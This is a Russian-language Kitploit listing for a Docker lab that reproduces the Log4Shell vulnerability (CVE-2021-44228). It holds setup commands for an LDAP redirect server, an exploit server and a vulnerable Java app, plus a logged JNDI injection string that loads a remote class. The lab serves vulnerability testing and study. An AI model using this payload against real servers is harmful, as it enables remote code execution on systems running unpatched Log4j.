Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228_Example — Docker-based среда воспроизведения для CVE-2021-44228 (Log4Shell) с marshalsec LDAP-сервером, exploit web-сервером и уязвимым Java-приложением для тестирования JNDI инъекции. | Kitploit
Инструменты/GitHubGitHub/chilliwebs/cve-2021-44228_example
Динамический анализ (песочница)Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложений
GitHubchilliwebs/cve-2021-44228_example

CVE-2021-44228_Example

Docker-based среда воспроизведения для CVE-2021-44228 (Log4Shell) с marshalsec LDAP-сервером, exploit web-сервером и уязвимым Java-приложением для тестирования JNDI инъекции.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 лет назадЕщё не проверено

CVE-2021-44228_Пример

Запустите каждую из 3 секций в отдельной вкладке/консоли

marshalsec LDAP сервер https://github.com/chilliwebs/marshalsec (Форкнуто из https://github.com/mbechler/marshalsec)

root@kitploit:~
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec

Веб-сервер эксплойта

root@kitploit:~
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit

Приложение-подопытный (запущено с уязвимыми версиями Java и Log4J)

root@kitploit:~
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig

При запуске guinea_pig вы должны увидеть в логах следующее:

root@kitploit:~
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}

"PWND!" записывается из внешне внедрённого класса (Exploit)

Скачать инструмент